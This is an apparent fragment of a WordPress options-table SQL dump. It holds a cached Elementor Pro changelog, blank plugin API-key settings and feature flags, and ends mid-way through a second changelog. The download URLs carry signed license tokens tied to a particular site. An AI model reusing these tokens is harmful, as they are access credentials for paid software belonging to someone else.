2017-10-24<\\/h4>\\n<ul>\\n<li>Tweak: Improved UI for notices and license page<\\/li>\\n<li>Fix: Update system conflict with other EDD plugins<\\/li>\\n<li>Fix: WooCommerce frontend hooks on Elementor editor (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2577\\\">#2577<\\/a>)<\\/li>\\n<li>Fix: Removed default border left in Nav Menu dropdown CSS (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2496\\\">#2496<\\/a>)<\\/li>\\n<li>Fix: Increased submenu max-width (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2558\\\">#2558<\\/a>)<\\/li>\\n<li>Fix: Save global templates without their defaults<\\/li>\\n<li>Fix: Horizontal scrolling issue with posts grid<\\/li>\\n<\\/ul>\\n<h4>1.9.3 - 2017-10-03<\\/h4>\\n<ul>\\n<li>Fix: Condition slide style that got affected by previous update<\\/li>\\n<\\/ul>\\n<h4>1.9.2 - 2017-10-02<\\/h4>\\n<ul>\\n<li>New: Added integration with MailPoet 3 for Forms actions<\\/li>\\n<li>Fix: Removed height control from Testimonial carousel in mobile editing mode<\\/li>\\n<li>Fix: Removed bottom padding when there\'s no pagination in Testimonial carousel<\\/li>\\n<li>Fix: Added condition for slides style section in skin bubble mode<\\/li>\\n<li>Fix: Slides per view control for mobile editing in Testimonial carousel<\\/li>\\n<li>Fix: Navigation Arrows icons matched with common Elementor Navigation Arrows<\\/li>\\n<\\/ul>\\n<h4>1.9.1 - 2017-09-28<\\/h4>\\n<ul>\\n<li>Fix: Slides per view for slideshow carousel<\\/li>\\n<li>Fix: Final polish for the new Testimonial Carousel widget<\\/li>\\n<li>Fix: Don\'t play video if slide type is not video<\\/li>\\n<li>Fix: Removed slides style section condition (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2497\\\">#2497<\\/a>)<\\/li>\\n<li>Fix: Set cursor as pointer for slideshow thumbnails<\\/li>\\n<\\/ul>\\n<h4>1.9.0 - 2017-09-26<\\/h4>\\n<ul>\\n<li>New: Added Media Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/216\\\">#216<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/347\\\">#347<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2209\\\">#2209<\\/a>)<\\/li>\\n<li>New: Added Testimonial Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/715\\\">#715<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.8.3 - 2017-09-24<\\/h4>\\n<ul>\\n<li>Fix: Added compatibility for WordPress 4.8.2 & 4.7.6<\\/li>\\n<li>Fix: Remove slashes from Form sent data<\\/li>\\n<\\/ul>\\n<h4>1.8.2 - 2017-09-19<\\/h4>\\n<ul>\\n<li>Tweak: Added target URL for the tweet message in Blockquote widget<\\/li>\\n<li>Tweak: Render the slide height before the slider is finished loading<\\/li>\\n<li>Fix: Space between words for Animated Headline widget<\\/li>\\n<li>Fix: RTL compatibility for Animated Headline widget<\\/li>\\n<li>Fix: Italic font style for Animated Headline widget<\\/li>\\n<li>Fix: Excluded Menu widget from the WP Editor text rendering<\\/li>\\n<\\/ul>\\n<h4>1.8.1 - 2017-09-18<\\/h4>\\n<ul>\\n<li>Fix: WCAG Compatible "required" field attribute for W3C validation (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2391\\\">#2391<\\/a>)<\\/li>\\n<li>Fix: Print the main menu only when is necessary in Menu widget<\\/li>\\n<li>Fix: Use CSS media query instead of JS to hide items in Menu widget to avoid flickering on page load (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2381\\\">#2381<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.8.0 - 2017-09-12<\\/h4>\\n<ul>\\n<li>New: Added Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1406\\\">#1406<\\/a>)<\\/li>\\n<li>Fix: Field ID for checkbox control in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2279\\\">#2279<\\/a>)<\\/li>\\n<li>Fix: Style for Blockquote widget included<\\/li>\\n<\\/ul>\\n<h4>1.7.2 - 2017-09-07<\\/h4>\\n<ul>\\n<li>Tweak: Loading Facebook SDK via JS for better compatibility with caching plugins<\\/li>\\n<li>Fix: Responsive Embed Facebook post widget for Safari iOS (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2340\\\">#2340<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.7.1 - 2017-09-05<\\/h4>\\n<ul>\\n<li>Fix: Facebook SDK version<\\/li>\\n<\\/ul>\\n<h4>1.7.0 - 2017-09-05<\\/h4>\\n<ul>\\n<li>New: Added Facebook Button widget for Like, Recommend, Share and Follow<\\/li>\\n<li>New: Added Facebook Embed widget for Post, Video and Comment<\\/li>\\n<li>New: Added Facebook Comments widget<\\/li>\\n<li>New: Added Facebook Page widget (Previously known as Like Box)<\\/li>\\n<li>New: Added Blockquote widget with Tweet button<\\/li>\\n<li>Tweak: Added Facebook SDK integration for all Facebook widgets<\\/li>\\n<li>Fix: Animated headline rotating with long words<\\/li>\\n<\\/ul>\\n<h4>1.6.1 - 2017-08-28<\\/h4>\\n<ul>\\n<li>Fix: Animated Headline marker gets in front of neighboring spans even when "Bring to Front" is not set<\\/li>\\n<li>Fix: Stroke animation in Animated Headline for MS Edge browser<\\/li>\\n<li>Fix: Animated headline with more than 1-word per rotation<\\/li>\\n<li>Fix: Animated Headline in two lines<\\/li>\\n<li>Fix: Some errors in Global widget<\\/li>\\n<\\/ul>\\n<h4>1.6.0 - 2017-08-22<\\/h4>\\n<ul>\\n<li>New: Added Animated Headline widget<\\/li>\\n<li>New: Added Hidden field for Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2038\\\">#2038<\\/a>)<\\/li>\\n<li>Tweak: Added notice to update Elementor to v1.6.5 or higher<\\/li>\\n<li>Fix: CSS Animations names no longer minified, in order to prevent unexpected conflicts<\\/li>\\n<\\/ul>\\n<h4>1.5.9 - 2017-08-16<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the future release of Elementor v1.7<\\/li>\\n<li>Fix: Portfolio compatibility for GeneratePress theme<\\/li>\\n<li>Fix: Portfolio filter compatibility for RTL<\\/li>\\n<li>Fix: Pagination apply for all posts widget in the page<\\/li>\\n<li>Fix: Global form widget with MailChimp integration not saving<\\/li>\\n<\\/ul>\\n<h4>1.5.8 - 2017-07-25<\\/h4>\\n<ul>\\n<li>Tweak: Added compatibility for the future release of Elementor v1.6<\\/li>\\n<li>Fix: Improved backward compatibility for query control rename<\\/li>\\n<\\/ul>\\n<h4>1.5.7 - 2017-07-24<\\/h4>\\n<ul>\\n<li>Tweak: Moved JS render of reCAPTCHA to a separate file<\\/li>\\n<li>Tweak: Display the label in the reCAPTCHA field for better experience<\\/li>\\n<li>Tweak: Rename <code>panel-posts-control<\\/code> to <code>query-control<\\/code> and added fallback support<\\/li>\\n<li>Tweak: Added compatibility for the future release of Elementor with history feature<\\/li>\\n<li>Fix: reCAPTCHA preview on the editor<\\/li>\\n<li>Fix: Manual selection (query control) has stopped working after saving (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/2000\\\">#2000<\\/a>)<\\/li>\\n<li>Fix: Added condition for icon size control in Share Buttons widget<\\/li>\\n<\\/ul>\\n<h4>1.5.6 - 2017-07-12<\\/h4>\\n<ul>\\n<li>Fix: Query Control correction for taxonomies (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1963\\\">#1963<\\/a>)<\\/li>\\n<li>Fix: Custom CSS override scheme color in the editor<\\/li>\\n<li>Fix: Added order by Menu Order for Query Control in WC widget<\\/li>\\n<li>Fix: Glitch with Flip Box background overlay<\\/li>\\n<\\/ul>\\n<h4>1.5.5 - 2017-07-03<\\/h4>\\n<ul>\\n<li>Tweak: Moved reCAPTCHA render to handler & load only if a form is exist<\\/li>\\n<li>Fix: MailChimp integration: Default number of items returned by API increased to 999<\\/li>\\n<li>Fix: MailChimp integration: Refresh the groups list if API is changed<\\/li>\\n<li>Fix: Sorted items in filter bar by A-Z<\\/li>\\n<li>Fix: Editor glitch with Elementor v1.5 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1927\\\">#1927<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.5.4 - 2017-06-22<\\/h4>\\n<ul>\\n<li>Tweak: Improved compatibility for Elementor v1.5<\\/li>\\n<li>Fix: URL default for Add To Cart widget<\\/li>\\n<li>Fix: Allowed <code>date<\\/code> and <code>birthday<\\/code> fields as text for MailChimp integration<\\/li>\\n<\\/ul>\\n<h4>1.5.3 - 2017-06-19<\\/h4>\\n<ul>\\n<li>Tweak: Make flip-box height responsive control<\\/li>\\n<li>Fix: Facebook share count now gets retrieved by Elementor (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1829\\\">#1829<\\/a>)<\\/li>\\n<li>Fix: Global form widget with MailChimp integration not saving<\\/li>\\n<\\/ul>\\n<h4>1.5.2 - 2017-06-13<\\/h4>\\n<ul>\\n<li>Fix: Custom CSS panel location compatibility for the old versions<\\/li>\\n<\\/ul>\\n<h4>1.5.1 - 2017-06-12<\\/h4>\\n<ul>\\n<li>Fix: MailChimp update existing user registration<\\/li>\\n<li>Fix: Global widget with JS in the editor mode<\\/li>\\n<li>Fix: Label section condition in Login widget<\\/li>\\n<li>Fix: Changes to unlinked global widget do not appear in the editor<\\/li>\\n<\\/ul>\\n<h4>1.5.0 - 2017-05-23<\\/h4>\\n<ul>\\n<li>New: Added Cards, a new skin for Posts widget<\\/li>\\n<li>New: Added Exclude option to post query control group<\\/li>\\n<li>Tweak: Added <code>post_class()<\\/code> for each post in the loop<\\/li>\\n<li>Tweak: Added <code>.elementor-posts-masonry<\\/code> class when Masonry layout is enabled<\\/li>\\n<li>Tweak: Added compatibility for the next release of Elementor v1.5.0<\\/li>\\n<li>Tweak: CSS <code>autoprefixer<\\/code> now supports last 5 versions of browsers<\\/li>\\n<li>Tweak: Added <code>imageLoaded<\\/code> library for Posts & Portfolio widgets<\\/li>\\n<\\/ul>\\n<h4>1.4.4 - 2017-05-18<\\/h4>\\n<ul>\\n<li>Fix: Force Mailchimp API to return all lists and not just 10 (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1683\\\">#1683<\\/a>)<\\/li>\\n<li>Fix: Added <code>.elementor-form<\\/code> class to Login form to fix style glitch<\\/li>\\n<\\/ul>\\n<h4>1.4.3 - 2017-05-14<\\/h4>\\n<ul>\\n<li>Tweak: Added Redirect After Login option to Login widget<\\/li>\\n<li>Tweak: Stay in the current page after logout in Login widget<\\/li>\\n<li>Tweak: Preparation for Elementor settings tabs in future version<\\/li>\\n<li>Fix: Pinterest in Share Buttons widget now sharing the URL alone<\\/li>\\n<li>Fix: Bug with <code>active<\\/code> class in portfolio filter item<\\/li>\\n<li>Fix: Higher specific list-style-type <code>none<\\/code> for filter items to override some theme style<\\/li>\\n<\\/ul>\\n<h4>1.4.2 - 2017-05-06<\\/h4>\\n<ul>\\n<li>Fix: Temporary patch for form field shortcode in some servers<\\/li>\\n<\\/ul>\\n<h4>1.4.1 - 2017-05-03<\\/h4>\\n<ul>\\n<li>Fix: Bug with custom success message in form widget<\\/li>\\n<li>Fix: Bug with meta data in email action<\\/li>\\n<\\/ul>\\n<h4>1.4.0 - 2017-05-03<\\/h4>\\n<ul>\\n<li>New: Forms: integration with MailChimp<\\/li>\\n<li>New: Forms: integration with MailPoet<\\/li>\\n<li>New: Forms: Added Email 2 action for email confirmation<\\/li>\\n<li>New: Forms: Added shortcodes for fields<\\/li>\\n<li>New: Forms: Added custom ID for fields<\\/li>\\n<li>New: Forms: Added option to edit email HTML template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1180\\\">#1180<\\/a>)<\\/li>\\n<li>New: Added Login widget<\\/li>\\n<li>Tweak: Move <code>send_html<\\/code> control to <code>email_content_type<\\/code><\\/li>\\n<li>Fix: Email still sent even if validation failed in form widget<\\/li>\\n<\\/ul>\\n<h4>1.3.2 - 2017-05-01<\\/h4>\\n<ul>\\n<li>New: Added action <code>elementor_pro\\/init<\\/code> for better integration with Elementor Pro<\\/li>\\n<li>Fix: Posts without featured image in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1234\\\">#1234<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1382\\\">#1382<\\/a>)<\\/li>\\n<li>Fix: reCAPTCHA & Honeypot fields with new method<\\/li>\\n<li>Fix: Added border width control in Share Buttons to avoid a glitch on Chrome browser<\\/li>\\n<li>Fix: Border radius glitch on hover in Share Buttons<\\/li>\\n<\\/ul>\\n<h4>1.3.1 - 2017-04-25<\\/h4>\\n<ul>\\n<li>Fix: Conflict update with revision history module<\\/li>\\n<\\/ul>\\n<h4>1.3.0 - 2017-04-25<\\/h4>\\n<ul>\\n<li>New: Added Share Buttons widget (<a href=\\\"https:\\/\\/wordpress.org\\/support\\/topic\\/social-sharing-buttons-is-it-possible\\/\\\">Topic<\\/a>)<\\/li>\\n<li>New: Added Custom CSS for Page Settings<\\/li>\\n<li>New: Added Masonry layout for Portfolio widget<\\/li>\\n<li>New: Added Cc & Bcc options to email action (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1181\\\">#1181<\\/a>)<\\/li>\\n<li>New: Introduced <code>ElementorProModulesFormsClassesAction_Base<\\/code> class for better 3rd party integration for forms<\\/li>\\n<li>Tweak: Debugger module now also shows errors from Pro<\\/li>\\n<li>Tweak: Added options for Elementor Library<\\/li>\\n<li>Tweak: New base posts module for optimized performance<\\/li>\\n<li>Tweak: Adjusting Posts \\/ Portfolio to the new structure<\\/li>\\n<li>Fix: Export for posts \\/ portfolio<\\/li>\\n<li>Fix: Duplicate repeater field with switcher control (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1442\\\">#1442<\\/a>)<\\/li>\\n<li>Fix: Post per Page in the query control<\\/li>\\n<li>Fix: Metadata does not come through on form emails (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1566\\\">#1566<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.2.6 - 2017-04-19<\\/h4>\\n<ul>\\n<li>Fix: Added compatibility with WooCommerce 3.0 - Products & Add to Cart widgets<\\/li>\\n<\\/ul>\\n<h4>1.2.5 - 2017-04-18<\\/h4>\\n<ul>\\n<li>Fix: Offset query for posts widgets (Posts, Portfolio and Products)<\\/li>\\n<\\/ul>\\n<h4>1.2.4 - 2017-03-21<\\/h4>\\n<ul>\\n<li>Tweak: Added Indian Rupee sign to Price Table widget<\\/li>\\n<li>Fix: Portfolio grid for IE11<\\/li>\\n<li>Fix: Link target blank in Price List widget<\\/li>\\n<li>Fix: Active item for filter bar in Portfolio widget<\\/li>\\n<\\/ul>\\n<h4>1.2.3 - 2017-03-06<\\/h4>\\n<ul>\\n<li>Tweak: Fully compatible with Elementor v1.3.0<\\/li>\\n<li>Tweak: Added trigger for after form submission in Forms widget<\\/li>\\n<li>Tweak: Changed handle name in reCAPTCHA field to avoid conflict with other contact forms<\\/li>\\n<li>Fix: Portfolio filter syntax in Non-Latin languages<\\/li>\\n<li>Fix: Added <code>no-repeat<\\/code> property for slide with <code>background-size:contain<\\/code><\\/li>\\n<li>Fix: Condition control & Import value in Posts widgets<\\/li>\\n<li>Fix: Offset and Pagination in WordPress (<a href=\\\"https:\\/\\/codex.wordpress.org\\/Making_Custom_Queries_using_Offset_and_Pagination\\\">More Info<\\/a>)<\\/li>\\n<li>Fix: Submit handler bubbling for custom events in Forms widget<\\/li>\\n<\\/ul>\\n<h4>1.2.2 - 2017-02-23<\\/h4>\\n<ul>\\n<li>Tweak: Change name from Side A\\/B to Front and Back in Flip Box widget<\\/li>\\n<li>Fix: Error when saving third party widgets in the global widget<\\/li>\\n<li>Fix: Image position "none" remains visible in editor preview (Posts)<\\/li>\\n<li>Fix: Hide the pagination when there are no links<\\/li>\\n<\\/ul>\\n<h4>1.2.1 - 2017-02-21<\\/h4>\\n<ul>\\n<li>Fix: Firefox Flip Box 3D compatibility<\\/li>\\n<\\/ul>\\n<h4>1.2.0 - 2017-02-21<\\/h4>\\n<ul>\\n<li>New: Added Flip Box widget<\\/li>\\n<li>New: Added Ken Burns effect for slides<\\/li>\\n<li>New: Added Masonry layout for Posts widget<\\/li>\\n<li>New: Added Pagination option for Posts widget<\\/li>\\n<li>Tweak: Added background size contain to slides<\\/li>\\n<li>Tweak: Improve Query control by preload items<\\/li>\\n<li>Fix: Text color for Checkbox and Radio fields<\\/li>\\n<\\/ul>\\n<h4>1.1.2 - 2017-02-05<\\/h4>\\n<ul>\\n<li>Tweak: Added <code>aria-required<\\/code> for better accessibility in forms widget<\\/li>\\n<li>Fix: Conflict Call to <code>undefined<\\/code> method in Posts & Portfolio widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1271\\\">#1271<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1266\\\">#1266<\\/a>)<\\/li>\\n<li>Fix: Submit button HTML after error sending<\\/li>\\n<li>Fix: Success message for <code>skip_email<\\/code> function<\\/li>\\n<li>Notice: Elementor 1.2.0 or later now required<\\/li>\\n<\\/ul>\\n<h4>1.1.1 - 2017-01-24<\\/h4>\\n<ul>\\n<li>Fix: Can\'t save global widgets when <code>WP_DEBUG<\\/code> is <code>true<\\/code><\\/li>\\n<li>Fix: Undefined variable in WC widgets<\\/li>\\n<li>Fix: Removed duplicate strings<\\/li>\\n<\\/ul>\\n<h4>1.1.0 - 2017-01-24<\\/h4>\\n<ul>\\n<li>New: Price Table widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/102\\\">#102<\\/a>)<\\/li>\\n<li>New: WooCommerce Add to Cart widget<\\/li>\\n<li>New: WooCommerce Categories widget<\\/li>\\n<li>New: WooCommerce Elements widget<\\/li>\\n<li>New: Honeypot field for Forms widgets<\\/li>\\n<li>Tweak: Added inline options for taxonomies & authors if is less than 15 items<\\/li>\\n<li>Tweak: Added Required Mark for fields in Forms widget<\\/li>\\n<li>Fix: CSS selectors priority in Slides widget<\\/li>\\n<li>Fix: CSS bug in Price List widget<\\/li>\\n<li>Fix: Update all Post CSS files that includes specific Global Widget<\\/li>\\n<\\/ul>\\n<h4>1.0.9 - 2017-01-18<\\/h4>\\n<ul>\\n<li>Fix: Auto complete bug in query controls<\\/li>\\n<li>Fix: Render template with escaping slashes<\\/li>\\n<li>Fix: Reply-to field in Forms widget<\\/li>\\n<\\/ul>\\n<h4>1.0.8 - 2017-01-11<\\/h4>\\n<ul>\\n<li>Tweak: Code adjustments for Elementor API<\\/li>\\n<li>Fix: Removed go pro link from plugins page in admin<\\/li>\\n<\\/ul>\\n<h4>1.0.7 - 2017-01-05<\\/h4>\\n<ul>\\n<li>Tweak: Added filter by featured \\/ sale for WC Products widget<\\/li>\\n<li>Tweak: Added author control in Portfolio widget<\\/li>\\n<li>Tweak: Code adjustments for Elementor API<\\/li>\\n<li>Fix: Added support for empty image ratio<\\/li>\\n<li>Fix: Avoid nesting a sidebar within a template that will appear in the sidebar itself<\\/li>\\n<\\/ul>\\n<h4>1.0.6 - 2017-01-01<\\/h4>\\n<ul>\\n<li>Tweak: Added Auto-updates for local translation files<\\/li>\\n<li>Fix: Custom CSS for Global widgets<\\/li>\\n<li>Fix: Remove <code>nonce<\\/code> field (Fix some cache plugins)<\\/li>\\n<\\/ul>\\n<h4>1.0.5 - 2016-12-27<\\/h4>\\n<ul>\\n<li>Fix: Slide element bug fix - \'Link apply on\' logic<\\/li>\\n<li>Fix: Removed unique wrapper for Custom CSS in order to allow media queries (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1086\\\">#1086<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>1.0.4 - 2016-12-21<\\/h4>\\n<ul>\\n<li>Tweak: Mobile Editing for fields in the form widget<\\/li>\\n<li>Tweak: Mobile Editing for posts<\\/li>\\n<li>Tweak: Allow send form as HTML<\\/li>\\n<li>Tweak: Improved auto upgrades for Multisite installation<\\/li>\\n<li>Tweak: Improve editor rendering experience for Portfolio widget<\\/li>\\n<li>Fix: Posts widget check if image exist<\\/li>\\n<li>Fix: Changed the clone method for global widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/1042\\\">#1042<\\/a>)<\\/li>\\n<li>Fix: Bug slides in RTL (removed direction control)<\\/li>\\n<li>Fix: Slides with no height jumps when changing slides<\\/li>\\n<\\/ul>\\n<h4>1.0.3 - 2016-12-13<\\/h4>\\n<ul>\\n<li>Fix: Added escape placeholder for HTML Entities in form widget<\\/li>\\n<li>Fix: Countdown widget RTL bug<\\/li>\\n<li>Fix: Remove redundant #elementor selector for control style<\\/li>\\n<li>Fix: Added prefixing with \'0\' for one digit number in Countdown widget<\\/li>\\n<\\/ul>\\n<h4>1.0.2 - 2016-12-12<\\/h4>\\n<ul>\\n<li>Fix: Page layout collapses when inserting reCAPTCHA field in Form<\\/li>\\n<\\/ul>\\n<h4>1.0.1 - 2016-12-12<\\/h4>\\n<ul>\\n<li>Fix: WordPress widgets disappear from Editor when Elementor Pro active<\\/li>\\n<\\/ul>\\n<h4>1.0.0 - 2016-12-12<\\/h4>\\n<ul>\\n<li>Initial release<\\/li>\\n<\\/ul>\\\";}\",\"new_version\":\"3.29.2\",\"name\":\"Elementor Pro\",\"slug\":\"elementor-pro\",\"url\":\"https:\\/\\/elementor.com\\/pro\\/changelog\\/\",\"homepage\":\"https:\\/\\/elementor.com\\/pro\\/\",\"requires\":\"5.0\",\"tested\":\"6.8.1\",\"elementor_requires\":\"3.0.1\",\"package\":\"https:\\/\\/plugin-downloads.elementor.com\\/v2\\/package_download\\/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiYWN0aXZhdGVkIiwidXJsIjoiaHR0cHM6Ly9pY3RiYW5rLmlyL2Jsb2ciLCJkb3dubG9hZF9iZXRhIjpmYWxzZSwiZmlsZV9rZXkiOiIxIiwiaWF0IjoxNzUxMTgzNTcxLCJleHAiOjE3NTEyNjk5NzF9.748Gz5fYJ4SSVXzbFL-sIgcgf3S7EEG3WgmEDfLr760\\/package_download\",\"download_link\":\"https:\\/\\/plugin-downloads.elementor.com\\/v2\\/package_download\\/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiYWN0aXZhdGVkIiwidXJsIjoiaHR0cHM6Ly9pY3RiYW5rLmlyL2Jsb2ciLCJkb3dubG9hZF9iZXRhIjpmYWxzZSwiZmlsZV9rZXkiOiIxIiwiaWF0IjoxNzUxMTgzNTcxLCJleHAiOjE3NTEyNjk5NzF9.748Gz5fYJ4SSVXzbFL-sIgcgf3S7EEG3WgmEDfLr760\\/package_download\",\"banners\":{\"2x\":\"https:\\/\\/ps.w.org\\/elementor\\/assets\\/banner-1544x500.png?rev=1475479\",\"1x\":\"https:\\/\\/ps.w.org\\/elementor\\/assets\\/banner-772x250.png?rev=1475479\"},\"icons\":{\"svg\":\"https:\\/\\/storage.googleapis.com\\/web-public-files\\/Web%20Assets\\/icons\\/icon.svg\"},\"canary_deployment\":{\"plugin_info\":{\"new_version\":\"3.7.0\",\"name\":\"Elementor Pro\",\"slug\":\"elementor-pro\",\"url\":\"https:\\/\\/elementor.com\\/pro\\/changelog\\/\",\"homepage\":\"https:\\/\\/elementor.com\\/pro\\/\",\"requires\":\"5.0\",\"tested\":\"6.8.1\",\"elementor_requires\":\"3.0.1\",\"package\":\"https:\\/\\/plugin-downloads.elementor.com\\/v2\\/previous_download\\/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiYWN0aXZhdGVkIiwidmVyc2lvbiI6IjMuNy4wIiwidXJsIjoiaHR0cHM6Ly9pY3RiYW5rLmlyL2Jsb2ciLCJpYXQiOjE3NTExODM1NzEsImV4cCI6MTc1MTI2OTk3MX0.Uks5bv2pQQCFlDoFvbmUBXETweEmCgqgMjXol66MOYE\\/previous_download\",\"download_link\":\"https:\\/\\/plugin-downloads.elementor.com\\/v2\\/previous_download\\/eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsaWNlbnNlIjoiYWN0aXZhdGVkIiwidmVyc2lvbiI6IjMuNy4wIiwidXJsIjoiaHR0cHM6Ly9pY3RiYW5rLmlyL2Jsb2ciLCJpYXQiOjE3NTExODM1NzEsImV4cCI6MTc1MTI2OTk3MX0.Uks5bv2pQQCFlDoFvbmUBXETweEmCgqgMjXol66MOYE\\/previous_download\",\"banners\":{\"2x\":\"https:\\/\\/ps.w.org\\/elementor\\/assets\\/banner-1544x500.png?rev=1475479\",\"1x\":\"https:\\/\\/ps.w.org\\/elementor\\/assets\\/banner-772x250.png?rev=1475479\"},\"icons\":{\"svg\":\"https:\\/\\/storage.googleapis.com\\/web-public-files\\/Web%20Assets\\/icons\\/icon.svg\"}},\"conditions\":[[{\"type\":\"language\",\"languages\":[\"he_IL\",\"nl_NL\",\"en_GB\",\"en_NZ\",\"en_ZA\",\"en_AU\",\"en_CA\",\"sv_SE\",\"da_DK\",\"fr_FR\",\"nl_NL\",\"nb_NO\",\"de_AT\",\"fi\",\"it_IT\",\"nn_NO\",\"de_CH\",\"en_GB\",\"is_IS\",\"ga\",\"fr_BE\",\"nl_BE\",\"ast\",\"lb_LU\",\"es_ES\",\"pt_PT\",\"mlt\"],\"operator\":\"in\"}]]},\"cloud\":false}\";}','off'),
(493661,'wp_d01fea3441adf2c2e7b8a326f0b7c7e6','1751804198','off'),
(494710,'elementor_pro_recaptcha_site_key','','auto'),
(494711,'elementor_pro_recaptcha_secret_key','','auto'),
(494712,'elementor_pro_recaptcha_v3_site_key','','auto'),
(494713,'elementor_pro_recaptcha_v3_secret_key','','auto'),
(494714,'elementor_pro_recaptcha_v3_threshold','0.5','auto'),
(494715,'elementor_pro_facebook_app_id','','auto'),
(494716,'elementor_pro_mailchimp_api_key','','auto'),
(494717,'elementor_validate_api_data','','auto'),
(494718,'elementor_pro_drip_api_token','','auto'),
(494719,'elementor_pro_activecampaign_api_key','','auto'),
(494720,'elementor_pro_activecampaign_api_url','','auto'),
(494721,'elementor_pro_getresponse_api_key','','auto'),
(494722,'elementor_pro_convertkit_api_key','','auto'),
(494723,'elementor_pro_mailerlite_api_key','','auto'),
(494724,'elementor_typekit-kit-id','','auto'),
(494726,'elementor_pro_stripe_test_secret_key','','auto'),
(494727,'elementor_validate_stripe_api_test_secret_key_button','','auto'),
(494728,'elementor_pro_stripe_live_secret_key','','auto'),
(494729,'elementor_validate_stripe_api_live_secret_key_button','','auto'),
(494730,'elementor_stripe_legal_disclaimer','','auto'),
(494731,'elementor_form-submissions','','auto'),
(494732,'elementor_optimized_image_loading','1','auto'),
(494733,'elementor_optimized_gutenberg_loading','1','auto'),
(494734,'elementor_lazy_load_background_images','1','auto'),
(494735,'elementor_experiment-e_optimized_markup','active','auto'),
(494736,'elementor_experiment-e_element_cache','active','auto'),
(494737,'elementor_experiment-mega-menu','active','auto'),
(494738,'elementor_experiment-e_local_google_fonts','active','auto'),
(494739,'elementor_experiment-theme_builder_v2','active','auto'),
(494742,'elementor_font_awesome_pro_kit_id','','auto'),
(494743,'elementor_element_cache_ttl','24','auto'),
(498832,'can_compress_scripts','0','on'),
(499389,'elementor_pro_remote_info_api_data_3.26.3','a:2:{s:7:\"timeout\";i:1756961683;s:5:\"value\";s:245738:\"{\"stable_version\":\"3.31.2\",\"last_updated\":\"2025-08-10 09:31:59\",\"sections\":\"a:2:{s:11:\\\"description\\\";s:161:\\\"Elementor Pro adds new features to the Elementor Page Builder plugin. Control your conversions, your user engagement, your entire website, from one page builder.\\\";s:9:\\\"changelog\\\";s:230038:\\\"<h2>Elementor Pro - by Elementor.com<\\/h2>\\n<h4>3.31.2 - 2025-08-10<\\/h4>\\n<ul>\\n<li>Tweak: Improved release version functionality<\\/li>\\n<\\/ul>\\n<h4>3.31.1 - 2025-08-06<\\/h4>\\n<ul>\\n<li>Tweak: Updated <code>form-data<\\/code> package version<\\/li>\\n<\\/ul>\\n<h4>3.31.0 - 2025-08-05<\\/h4>\\n<ul>\\n<li>New: Introducing Attributes - add custom HTML attributes to elements for advanced control - Editor V4<\\/li>\\n<li>Tweak: Optimized Custom Code styles by removing redundant RTL file<\\/li>\\n<li>Tweak: Improved performance by loading ribbon styles only when used in Call to Action and Price Table widgets<\\/li>\\n<li>Tweak: Improved semantic markup structure for header and footer documents<\\/li>\\n<li>Tweak: Reorganized design controls in Animated Headline widget<\\/li>\\n<li>Tweak: Reorganized design controls in Blockquote widget<\\/li>\\n<li>Tweak: Reorganized design controls in Countdown widget<\\/li>\\n<li>Tweak: Replaced SASS mixins and functions with native CSS logical properties<\\/li>\\n<li>Fix: Empty headers are rendered in Table of Contents widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/28167\\\">#28167<\\/a>)<\\/li>\\n<li>Fix: <code>TypeError<\\/code> bug in Menu widget<\\/li>\\n<\\/ul>\\n<h4>3.30.1 - 2025-07-22<\\/h4>\\n<ul>\\n<li>Security Fix: Improved content 